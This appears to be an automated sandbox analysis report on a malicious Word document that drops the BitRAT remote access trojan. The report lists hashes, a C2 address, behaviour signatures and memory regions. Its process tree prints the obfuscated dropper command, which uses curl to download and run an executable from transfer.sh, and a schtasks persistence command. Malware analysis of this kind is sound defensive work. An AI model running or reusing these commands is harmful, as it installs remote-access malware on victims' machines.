Analysis

  • max time kernel
    143s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230831-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230831-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-09-2023 15:19

General

  • Target

    17cfb90deb531e2068d99e671423d8d1bcf8f06a0e2666f0108ca8e8b706dd1b.doc

  • Size

    191KB

  • MD5

    68297123bc1ddbbd9336aa121a9dd534

  • SHA1

    2d8016319edb893e0ae600ba8c89f00a30466967

  • SHA256

    17cfb90deb531e2068d99e671423d8d1bcf8f06a0e2666f0108ca8e8b706dd1b

  • SHA512

    29e3e9e7e8a1b5c9fd54d97379e7f73cc2ee8174b950d7bf1b44f6f129893d6dec64c8ddb63f071184ea93bc88f1e5b7d0e1f99304c4af54f42af9042f6d092b

  • SSDEEP

    3072:SbiyWTxSoVHpNY6nemhInf/va46YP6z+dzL:miyWTwoVHp6m0/yl6H9L

Score
10/10

Malware Config

Extracted

Family

bitrat

Version

1.38

C2

185.225.75.68:3569

Attributes
  • communication_password

    0edcbe7d888380c49e7d1dcf67b6ea6e

  • tor_process

    tor

Signatures

  • BitRAT

    BitRAT is a remote access tool written in C++ and uses leaked source code from other families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\17cfb90deb531e2068d99e671423d8d1bcf8f06a0e2666f0108ca8e8b706dd1b.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:852
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c pow^ers^hell/W 01 c^u^rl htt^ps://transfer.sh/get/gj04sqKk7O/boat.e^xe -o C:\Users\Public\dx5ys.exe;C:\Users\Public\dx5ys.exe
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1220
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell /W 01 curl https://transfer.sh/get/gj04sqKk7O/boat.exe -o C:\Users\Public\dx5ys.exe;C:\Users\Public\dx5ys.exe
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1228
        • C:\Users\Public\dx5ys.exe
          "C:\Users\Public\dx5ys.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:4644
          • C:\Users\Public\dx5ys.exe
            "C:\Users\Public\dx5ys.exe"
            5⤵
            • Executes dropped EXE
            PID:4568
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 188
              6⤵
              • Program crash
              PID:1368
          • C:\Windows\SysWOW64\cmd.exe
            "cmd" /c copy "C:\Users\Public\dx5ys.exe" "C:\Users\Admin\AppData\Roaming\pint\pint.exe"
            5⤵
              PID:380
            • C:\Windows\SysWOW64\cmd.exe
              "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\pint\pint.exe'" /f
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1660
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\pint\pint.exe'" /f
                6⤵
                • Creates scheduled task(s)
                PID:4220
            • C:\Windows\SysWOW64\cmd.exe
              "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\pint"
              5⤵
                PID:4512
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4568 -ip 4568
        1⤵
          PID:3544

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3osvlzg2.u0q.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Roaming\pint\pint.exe
          Filesize

          3.8MB

          MD5

          6d4c3a4ff3637ec34f820172f897d476

          SHA1

          d53fe8f0ecb0536088ec9be5247ab6627baf31cb

          SHA256

          c609d25041b7c463a726027c99c0a264b1e77415612e445fc39cfc9aae9801f3

          SHA512

          1ff5f4b215bedf6824c9c1932b5e8dbcbb8e459ee2839c598cc0f955b2948e25c5ce834b963ee1cf6ea22954e9c1fa4b102f117808f6dc8a4891b36c37d7e894

        • C:\Users\Public\dx5ys.exe
          Filesize

          3.8MB

          MD5

          6d4c3a4ff3637ec34f820172f897d476

          SHA1

          d53fe8f0ecb0536088ec9be5247ab6627baf31cb

          SHA256

          c609d25041b7c463a726027c99c0a264b1e77415612e445fc39cfc9aae9801f3

          SHA512

          1ff5f4b215bedf6824c9c1932b5e8dbcbb8e459ee2839c598cc0f955b2948e25c5ce834b963ee1cf6ea22954e9c1fa4b102f117808f6dc8a4891b36c37d7e894

        • C:\Users\Public\dx5ys.exe
          Filesize

          3.8MB

          MD5

          6d4c3a4ff3637ec34f820172f897d476

          SHA1

          d53fe8f0ecb0536088ec9be5247ab6627baf31cb

          SHA256

          c609d25041b7c463a726027c99c0a264b1e77415612e445fc39cfc9aae9801f3

          SHA512

          1ff5f4b215bedf6824c9c1932b5e8dbcbb8e459ee2839c598cc0f955b2948e25c5ce834b963ee1cf6ea22954e9c1fa4b102f117808f6dc8a4891b36c37d7e894

        • C:\Users\Public\dx5ys.exe
          Filesize

          3.8MB

          MD5

          6d4c3a4ff3637ec34f820172f897d476

          SHA1

          d53fe8f0ecb0536088ec9be5247ab6627baf31cb

          SHA256

          c609d25041b7c463a726027c99c0a264b1e77415612e445fc39cfc9aae9801f3

          SHA512

          1ff5f4b215bedf6824c9c1932b5e8dbcbb8e459ee2839c598cc0f955b2948e25c5ce834b963ee1cf6ea22954e9c1fa4b102f117808f6dc8a4891b36c37d7e894

        • memory/852-12-0x00007FF840750000-0x00007FF840945000-memory.dmp
          Filesize

          2.0MB

        • memory/852-8-0x00007FF840750000-0x00007FF840945000-memory.dmp
          Filesize

          2.0MB

        • memory/852-7-0x00007FF8007D0000-0x00007FF8007E0000-memory.dmp
          Filesize

          64KB

        • memory/852-5-0x00007FF840750000-0x00007FF840945000-memory.dmp
          Filesize

          2.0MB

        • memory/852-9-0x00007FF840750000-0x00007FF840945000-memory.dmp
          Filesize

          2.0MB

        • memory/852-10-0x00007FF840750000-0x00007FF840945000-memory.dmp
          Filesize

          2.0MB

        • memory/852-11-0x00007FF840750000-0x00007FF840945000-memory.dmp
          Filesize

          2.0MB

        • memory/852-0-0x00007FF8007D0000-0x00007FF8007E0000-memory.dmp
          Filesize

          64KB

        • memory/852-13-0x00007FF7FE250000-0x00007FF7FE260000-memory.dmp
          Filesize

          64KB

        • memory/852-14-0x00007FF840750000-0x00007FF840945000-memory.dmp
          Filesize

          2.0MB

        • memory/852-15-0x00007FF840750000-0x00007FF840945000-memory.dmp
          Filesize

          2.0MB

        • memory/852-16-0x00007FF840750000-0x00007FF840945000-memory.dmp
          Filesize

          2.0MB

        • memory/852-17-0x00007FF840750000-0x00007FF840945000-memory.dmp
          Filesize

          2.0MB

        • memory/852-18-0x00007FF7FE250000-0x00007FF7FE260000-memory.dmp
          Filesize

          64KB

        • memory/852-28-0x00000206E6A20000-0x00000206E79F0000-memory.dmp
          Filesize

          15.8MB

        • memory/852-44-0x00007FF840750000-0x00007FF840945000-memory.dmp
          Filesize

          2.0MB

        • memory/852-30-0x00000206E6A20000-0x00000206E79F0000-memory.dmp
          Filesize

          15.8MB

        • memory/852-3-0x00007FF8007D0000-0x00007FF8007E0000-memory.dmp
          Filesize

          64KB

        • memory/852-2-0x00007FF8007D0000-0x00007FF8007E0000-memory.dmp
          Filesize

          64KB

        • memory/852-4-0x00007FF840750000-0x00007FF840945000-memory.dmp
          Filesize

          2.0MB

        • memory/852-1-0x00007FF840750000-0x00007FF840945000-memory.dmp
          Filesize

          2.0MB

        • memory/852-6-0x00007FF8007D0000-0x00007FF8007E0000-memory.dmp
          Filesize

          64KB

        • memory/852-29-0x00000206E6A20000-0x00000206E79F0000-memory.dmp
          Filesize

          15.8MB

        • memory/852-45-0x00007FF840750000-0x00007FF840945000-memory.dmp
          Filesize

          2.0MB

        • memory/852-46-0x00007FF840750000-0x00007FF840945000-memory.dmp
          Filesize

          2.0MB

        • memory/852-48-0x00000206E6A20000-0x00000206E79F0000-memory.dmp
          Filesize

          15.8MB

        • memory/852-54-0x00000206E6A20000-0x00000206E79F0000-memory.dmp
          Filesize

          15.8MB

        • memory/852-55-0x00000206E6A20000-0x00000206E79F0000-memory.dmp
          Filesize

          15.8MB

        • memory/1228-31-0x00007FF813490000-0x00007FF813F51000-memory.dmp
          Filesize

          10.8MB

        • memory/1228-57-0x00000261726C0000-0x00000261726D0000-memory.dmp
          Filesize

          64KB

        • memory/1228-43-0x00000261726C0000-0x00000261726D0000-memory.dmp
          Filesize

          64KB

        • memory/1228-66-0x00007FF813490000-0x00007FF813F51000-memory.dmp
          Filesize

          10.8MB

        • memory/1228-56-0x00007FF813490000-0x00007FF813F51000-memory.dmp
          Filesize

          10.8MB

        • memory/1228-38-0x0000026172690000-0x00000261726B2000-memory.dmp
          Filesize

          136KB

        • memory/1228-32-0x00000261726C0000-0x00000261726D0000-memory.dmp
          Filesize

          64KB

        • memory/4568-82-0x0000000000C30000-0x0000000000FFE000-memory.dmp
          Filesize

          3.8MB

        • memory/4568-77-0x0000000000C30000-0x0000000000FFE000-memory.dmp
          Filesize

          3.8MB

        • memory/4568-72-0x0000000000C30000-0x0000000000FFE000-memory.dmp
          Filesize

          3.8MB

        • memory/4644-69-0x0000000006200000-0x00000000067A4000-memory.dmp
          Filesize

          5.6MB

        • memory/4644-78-0x0000000074FF0000-0x00000000757A0000-memory.dmp
          Filesize

          7.7MB

        • memory/4644-70-0x00000000036A0000-0x00000000036B0000-memory.dmp
          Filesize

          64KB

        • memory/4644-67-0x0000000074FF0000-0x00000000757A0000-memory.dmp
          Filesize

          7.7MB

        • memory/4644-68-0x0000000000EE0000-0x00000000012B8000-memory.dmp
          Filesize

          3.8MB